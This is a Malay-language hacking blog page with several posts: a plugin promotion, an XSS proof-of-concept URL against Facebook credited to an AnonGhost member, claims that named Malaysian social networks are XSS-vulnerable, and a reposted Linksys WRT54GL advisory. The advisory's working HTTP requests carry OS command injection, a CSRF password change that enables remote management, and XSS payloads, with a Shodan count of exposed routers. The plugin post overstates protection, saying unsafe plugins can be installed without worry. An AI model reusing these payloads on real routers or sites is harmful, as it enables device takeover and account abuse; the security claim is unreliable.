Hide My WP! 95% selamat dari SQl injection dan Serangan Xss.

Assalamualaiikum dan selamat sejahtera.
Wordpress merupakan salah satu platform yang sangat popular pada masa kini.Penggunaan wordpress sangat luas, ada yang mengunakan wordpress sebagai blog, ada juga yang mengunakan wordpress sebagai tapak untuk laman sesawang rasmi ataupun peribadi.

Pada hakikatnya, ramai pengguna ingin menyembunyikan penggunaan wordpress mereka, ini kerana terdapat pelbagai bugs pada plugin atau tema wordpress.Untuk memastikan ianya sentiasa selamat, kita mungkin tiada masa untuk menyemak atau mengemas kini plugin setiap hari.


Kini anda boleh mencuba plugin Hidemy WP sebgai salah satu cara meningkatkan keselamatan sistem wordpress anda.Baru baru ini, kita boleh lihat serangan besar besaran pengodam terhadap laman laman yang digodam adalah kebanyakannya menggunakan sistem dari wordpress. diantara botnet yang paling agresif yang pernah dilihat

Tingkatkan keselamatan anda
Hidemy WP mengawal akses WP kepada fail PHP. Ia melindungi laman web anda 95% daripada SQL Injection dan serangan XSS. Ini bermakna anda boleh memasang plugin yang tidak selamat tanpa bimbang tentang keselamatan terutama kepada ancaman penggodam, spam dan robot yang selalu menyerang pengguna WordPress.

Ketahui lebih lanjut bagaimana ia berfungsi DISINI | lihat live demo DISINI
Jika anda ingin muat turun secara percuma, sila klick pada button download dibawah:


Jangan Lupa untuk terus bersama kami untuk info info terbaru di facebook GilerHackers DISINI.

{ Continue Reading }

Kelemahan XSS pada Facebook Login Page

Assalamualaiikum dan selamat Sejahtera.
Terbaru: Salah Seorang kumpulan penggodam dari Anonghost, Mauritania Attacker menemui kelemahan XSS Vulnerability di Facebook.com.

Apa Itu Xss?
Cross Site Scripting atau XSS ialah satu kaedah serangan menghantar malicious code yang disuntik (inject) pada URL laman web, dengan kelihatan seolah-olah datang dari sumber yang boleh dipercayai integritinya. Melalui cara ini, penggodam akan dapat memperolehi maklumat-maklumat sulit atau peribadi sasaran, juga dapat melancarkan aplikasi berbahaya. [ Baca info lanjut berkenaan XSS Disini ]

Dibawah adalah screen shot menunjukkan beberapa kod yang berjaya disuntik pada Url Facebook.com

Link Poc: https://www.facebook.com/r.php?locale=en_us&possible_fb_user=+display=&email=HACKED%20BY%20MAURITANIA%20ATTACKER%20see%20more%20news%20on%20www.gilerhackers.com


Sebelum ini, Mauritania Attacker juga pernah menjumpai beberapa bugs bugs yang terdapat pada laman facebook, kebanyakan kelemahan kelemahan ini masih belum diperbaiki lagi.

{ Continue Reading }

Marshable.net Terdedah kepada XSS vulnerability

Assalamualaiikum dan selamat sejahtera.
Baru baru ini,dikatakan kepada pemilik social network (rangkaian sosial) yang menggunakan script PHPFoX  untuk halaman mereka.kemungkinan besar mereka terdedah kepada suntikan XSS (mengikut eksploitasi)

Apa itu XSS
Cross Site Scripting atau kependekannya XSS ialah satu kaedah serangan menghantar malicious code yang disuntik (inject) pada URL laman web, dengan kelihatan seolah-olah datang dari sumber yang boleh dipercayai integritinya. Melalui cara ini, penggodam akan dapat memperolehi maklumat-maklumat sulit atau peribadi sasaran, juga dapat melancarkan aplikasi berbahaya.

Dengan kata lain, ia adalah kaedah serangan melalui Javascript yang dibuat untuk mengeksploitasi kelemahan (vulnerability) pada sesebuah laman web. (via: OMG hackers)

beberapa laman social Network malaysia seperti Marshable.net, Myheppi.com, Youkawan.com terjejas kepada serangan jenis ini.

dibawah adalah screenshot selepas kod XSS yang disuntik pada Url Mereka:

Live Demo:
www.Marshable.net/XSS-demo
www.myHeppi.com/XSS-demo
www.youKAWAN.com/XSS-demo

* Hosting Murah Serendah RM6.00? Domain Semurah RM30.00? biar betul beb!

{ Continue Reading }

[GH Exploit] Linksys WRT54GL 1.1 XSS / OS Command Injection

Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco

============ Vulnerable Firmware Releases: ============

Firmware Version: 4.30.15 build 2, 01/20/2011

============ Device Description: ============

The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.

Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL

============ Shodan Torks ============

Shodan Search: WRT54GL
= Results 27190 devices

============ Vulnerability Overview: ============

* OS Command Injection
= parameter: wan_hostname
= command: `%20ping%20192%2e168%2e178%2e101%20`

The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close

submit_button=indexchange_action=submit_type=action=Applynow_proto=dhcpdaylight_time=1lan_ipaddr=4wait_time=0need_reboot=0ui_language=dewan_proto=dhcprouter_name=testwan_hostname=`%20ping%20192%2e168%2e178%2e101%20`wan_domain=testmtu_enable=1wan_mtu=1500lan_ipaddr_0=192lan_ipaddr_1=168lan_ipaddr_2=178lan_ipaddr_3=166lan_netmask=255.255.255.0lan_proto=dhcpdhcp_check=dhcp_start=100dhcp_num=50dhcp_lease=0wan_dns=4wan_dns0_0=0wan_dns0_1=0wan_dns0_2=0wan_dns0_3=0wan_dns1_0=0wan_dns1_1=0wan_dns1_2=0wan_dns1_3=0wan_dns2_0=0wan_dns2_1=0wan_dns2_2=0wan_dns2_3=0wan_wins=4wan_wins_0=0wan_wins_1=0wan_wins_2=0wan_wins_3=0time_zone=-08+1+1_daylight_time=1

= Change the request method from HTTP Post to HTTP GET makes the exploitation easier:

http://192.168.178.166/apply.cgi?submit_button=indexchange_action=submit_type=action=Applynow_proto=dhcpdaylight_time=1lan_ipaddr=4wait_time=0need_reboot=0ui_language=dewan_proto=dhcprouter_name=testwan_hostname=`%20ping%20192%2e168%2e178%2e101%20`wan_domain=testmtu_enable=1wan_mtu=1500lan_ipaddr_0=192lan_ipaddr_1=168lan_ipaddr_2=178lan_ipaddr_3=166lan_netmask=255.255.255.0lan_proto=dhcpdhcp_check=dhcp_start=100dhcp_num=50dhcp_lease=0wan_dns=4wan_dns0_0=0wan_dns0_1=0wan_dns0_2=0wan_dns0_3=0wan_dns1_0=0wan_dns1_1=0wan_dns1_2=0wan_dns1_3=0wan_dns2_0=0wan_dns2_1=0wan_dns2_2=0wan_dns2_3=0wan_wins=4wan_wins_0=0wan_wins_1=0wan_wins_2=0wan_wins_3=0time_zone=-08+1+1_daylight_time=1

= This setting is placed permanent into the configuration and so it gets executed on every bootup process of the device.

* For changing the current password there is no request to the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Management.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 299

submit_button=Managementchange_action=action=ApplyPasswdModify=1remote_mgt_https=0http_enable=1https_enable=0wait_time=4need_reboot=0http_passwd=pwndhttp_passwdConfirm=pwnd_http_enable=1web_wl_filter=0remote_management=1http_wanport=8080upnp_enable=1upnp_config=1upnp_internet_dis=0

* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:

http://IP/apply.cgi?submit_button=Managementchange_action=action=ApplyPasswdModify=1remote_mgt_https=0http_enable=1https_enable=0wait_time=4need_reboot=0http_passwd=pwnd1http_passwdConfirm=pwnd1_http_enable=1web_wl_filter=0remote_management=1http_wanport=8080upnp_enable=1upnp_config=1upnp_internet_dis=0

* reflected XSS

= parameter: submit_button

Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Wireless_Basic.asp
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

submit_button=Wireless_Basic'%3balert('pwnd')//action=Applysubmit_type=change_action=next_page=wl_net_mode=mixedwl_ssid=testwl_channel=6wl_closed=0

* stored XSS (Access Restrictions - Richtliniennamen eingeben (place the XSS) - Zusammenfassung (Scriptcode gets executed)

= parameter: f_name

Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png

= Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:

http://192.168.178.166/apply.cgi?submit_button=Filterschange_action=submit_type=saveaction=Applyblocked_service=filter_web=filter_policy=f_status=0f_id=1f_status1=disablef_name=123"img%20src%3d"0"%20onerror%3dalert("XSSed1")f_status2=allowday_all=1time_all=1allday=blocked_service0=Noneblocked_service1=Nonehost0=host1=host2=host3=url0=url1=url2=url3=url4=url5=

============ Solution ============

Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.

Fixed Version: Ver.4.30.16 (Build 2)
Available since 10.01.2013

Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
Twitter: @s3cur1ty_de

============ Time Line: ============

September 2012 - discovered vulnerability
03.10.2012 - Contacted Linksys and give them detailed vulnerability details
03.10.2012 - Linksys responded with a case number
11.10.2012 - Status update from Linksys
23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
29.10.2012 - Send the Beta Agreement back
29.10.2012 - Linksys gives access to the new Beta Firmware
30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
30.10.2012 - Linksys responded that there is no ETA of the new firmware
17.01.2013 - Linksys informed me about the public release of mostly fixed version (XSS, OS Command Injection fixed)
18.01.2013 - public release
===================== Advisory end =====================

{ Continue Reading }